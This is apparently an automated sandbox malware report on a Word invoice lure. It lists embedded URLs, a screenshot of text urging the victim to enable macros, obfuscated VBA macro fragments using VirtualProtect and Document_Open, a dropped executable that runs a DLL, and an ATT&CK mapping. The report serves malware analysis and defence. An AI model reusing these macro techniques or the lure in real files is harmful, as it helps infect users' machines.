Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://pages.store.office.com/review/query
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://roaming.edog.
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://tasks.office.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

Source: global traffic

System Summary

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: Enable editing" button on W a the top bar, and then click "Enable content'. W O Type here to sear
Source: Screenshot number: 4	Screenshot OCR: Enable content'. W O Type here to search Ki E a a g wg m % I i '00% sf ^ 5'58 PM 8/11/2022 C

Office process drops PE file

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe

Jump to dropped file

Document contains an embedded VBA macro with suspicious strings

Source: wpswireless-invoice-08.11.22.doc	OLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
Source: wpswireless-invoice-08.11.22.doc	OLE, VBA macro line: Set = CallByName((), x8flLq("oQMjBoChn9f"), VbGet, )
Source: wpswireless-invoice-08.11.22.doc	OLE, VBA macro line: Set = CallByName((), x8flLq("nsTo4UOnp"), VbGet, )
Source: wpswireless-invoice-08.11.22.doc	OLE, VBA macro line: Set = CallByName((x8flLq("Jtmo0biJG8")), x8flLq("Csh99OPh1vt"), VbGet, x8flLq("SRJAAiC8wXlM"))
Source: ~DFDCA04E6C9BCC80E5.TMP.0.dr	OLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
Source: ~DFDCA04E6C9BCC80E5.TMP.0.dr	OLE, VBA macro line: Set = CallByName((), x8flLq("oQMjBoChn9f"), VbGet, )
Source: ~DFDCA04E6C9BCC80E5.TMP.0.dr	OLE, VBA macro line: Set = CallByName((), x8flLq("nsTo4UOnp"), VbGet, )
Source: ~DFDCA04E6C9BCC80E5.TMP.0.dr	OLE, VBA macro line: Set = CallByName((x8flLq("Jtmo0biJG8")), x8flLq("Csh99OPh1vt"), VbGet, x8flLq("SRJAAiC8wXlM"))

Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe

Code function: 3_2_000C4C9B

3_2_000C4C9B

Source: wpswireless-invoice-08.11.22.doc	OLE, VBA macro line: Private Sub Document_Open()
Source: ~DFDCA04E6C9BCC80E5.TMP.0.dr	OLE, VBA macro line: Private Sub Document_Open()

Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe	Code function: 3_2_000C5C96 NtQueryInformationToken,NtQueryInformationToken,RtlNtStatusToDosError,	3_2_000C5C96
Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe	Code function: 3_2_000C3F00 NtQuerySystemInformation,	3_2_000C3F00
Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe	Code function: 3_2_000C5D14 NtOpenProcessToken,RtlNtStatusToDosError,NtClose,QueryActCtxW,NtOpenProcessToken,NtSetInformationToken,NtClose,	3_2_000C5D14
Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe	Code function: 3_2_000C3F9E HeapSetInformation,NtSetInformationProcess,AttachConsole,LocalAlloc,LoadLibraryExW,GetProcAddress,SetErrorMode,FreeLibrary,LocalFree,DeactivateActCtx,ReleaseActCtx,FreeLibrary,LocalFree,FreeConsole,ExitProcess,	3_2_000C3F9E

Source: ~DFDCA04E6C9BCC80E5.TMP.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: r3F3.tmp.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: r3F3.tmp.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: r3F3.tmp.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: wpswireless-invoice-08.11.22.doc	OLE indicator, VBA macros: true
Source: ~DFDCA04E6C9BCC80E5.TMP.0.dr	OLE indicator, VBA macros: true

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe 4E15AA13A02798E924C63537E458A09415C48DAE0E7AFD5A3D25532A2AA935EE

Source: wpswireless-invoice-08.11.22.doc

ReversingLabs: Detection: 15%

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe "C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe" "C:\Users\user\AppData\Local\Temp\y133.tmp.dll",#1
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe "C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe" "C:\Users\user\AppData\Local\Temp\y133.tmp.dll",#1	Jump to behavior

Source: wpswireless-invoice-08.11.22.doc.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\wpswireless-invoice-08.11.22.doc

Source: wpswireless-invoice-08.11.22.doc

OLE indicator, Word Document stream: true

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\{D94CDAF8-0BEC-4747-AEC9-53EE215FAF49} - OProcSessId.dat

Jump to behavior

Source: classification engine

Classification label: mal92.expl.winDOC@3/14@0/1

Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe

Code function: 3_2_000C3E1D CoInitializeEx,CLSIDFromString,CoCreateInstance,CoUninitialize,

3_2_000C3E1D

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe

Code function: 3_2_000C3A94 LoadLibraryExW,GetLastError,FormatMessageW,RtlImageNtHeader,SetProcessMitigationPolicy,

3_2_000C3A94

Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe	Command line argument: WLDP.DLL		3_2_000C3F9E
Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe	Command line argument: localserver		3_2_000C3F9E

Source: wpswireless-invoice-08.11.22.doc	OLE document summary: title field not present or empty
Source: wpswireless-invoice-08.11.22.doc	OLE document summary: author field not present or empty
Source: wpswireless-invoice-08.11.22.doc	OLE document summary: edited time not present or 0
Source: ~DFDCA04E6C9BCC80E5.TMP.0.dr	OLE document summary: title field not present or empty
Source: ~DFDCA04E6C9BCC80E5.TMP.0.dr	OLE document summary: author field not present or empty
Source: ~DFDCA04E6C9BCC80E5.TMP.0.dr	OLE document summary: edited time not present or 0

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: wpswireless-invoice-08.11.22.doc

Initial sample: OLE zip file path = docProps/custom.xml

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source: wpswireless-invoice-08.11.22.doc

Static file information: File size 2350727 > 1048576

Source:	Binary string: rundll32.pdb source: r3F3.tmp.exe, r3F3.tmp.exe, 00000003.00000000.285193260.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, r3F3.tmp.exe.0.dr
Source:	Binary string: rundll32.pdbGCTL source: r3F3.tmp.exe, 00000003.00000000.285193260.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, r3F3.tmp.exe.0.dr

Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe	Code function: 3_2_000C68E0 push ecx; ret		3_2_000C68F3
Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe	Code function: 3_2_000C6989 push ecx; ret		3_2_000C699C

Source: r3F3.tmp.exe.0.dr

Static PE information: section name: .didat

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe

Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe

Code function: 3_2_000C2512 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,

3_2_000C2512

Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe

Code function: 3_2_000C6C10 GetLastError,SetLastError,GetProcessHeap,HeapFree,

3_2_000C6C10

Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe

Code function: 3_2_000C3D9F mov esi, dword ptr fs:[00000030h]

3_2_000C3D9F

Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe	Code function: 3_2_000C6580 SetUnhandledExceptionFilter,		3_2_000C6580
Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe	Code function: 3_2_000C6232 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		3_2_000C6232

Source: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe

Code function: 3_2_000C6783 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

3_2_000C6783

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Command and Scripting Interpreter	Path Interception	1 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	12 Scripting	Boot or Logon Initialization Scripts	1 Extra Window Memory Injection	1 Disable or Modify Tools	LSASS Memory	2 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	42 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	1 Process Injection	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	12 Scripting	NTDS	3 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	11 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Extra Window Memory Injection	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
wpswireless-invoice-08.11.22.doc	15%	ReversingLabs	Script-Macro.Trojan.Amphitryon
